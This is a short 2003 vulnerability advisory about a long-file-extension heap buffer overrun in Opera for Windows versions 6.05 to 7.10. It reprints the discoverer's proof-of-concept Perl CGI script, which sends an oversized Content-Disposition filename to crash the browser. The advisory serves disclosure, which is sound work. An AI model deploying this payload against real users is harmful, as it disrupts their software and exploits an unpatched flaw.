Long File Extension Heap Buffer Overrun Vulnerability in Opera for Windows

Reported April 28, 2003, by nesumin.

VERSIONS AFFECTED

• Opera for Windows 7.10 (build 2840), 7.03 (build 2670), 7.02 (build 2668), 7.02 bork (build 2656b), 7.01 (build 2651), 6.06b (build 1145), 6.06 (build 1144), 6.05 (build 1140)

DESCRIPTION

Several versions of Opera for Windows contain a Denial of Service (DoS) condition. The condition results from an unchecked buffer on the heap and Opera's failure to check the length of a filename.

DEMONSTRATION

The discoverer posted the following code as proof of concept:

================

  This is a Perl script.

  ---------------------------------------------------------------

  #!/usr/bin/perl

  # Smash Heap Memory.

  # This script is CGI program.

  $|=1;

  my $filename = "." . "\xCC" x (int(rand(0x20000)) + 0x100);

  print "Content-type: text/html\r\n";

  print qq~Content-Disposition: filename="$filename"\r\n~;

  print "\r\n";

  print "<html><body>Love & Peace :)</body></html>\r\n";

  ---------------------------------------------------------------

VENDOR RESPONSE

Opera has yet to respond to this problem.

CREDIT                                                                                                       

 

Discovered by nesumin.